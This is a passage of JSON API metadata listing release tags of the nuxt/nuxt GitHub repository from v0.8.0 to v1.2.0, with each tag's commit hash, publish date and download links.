t/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":n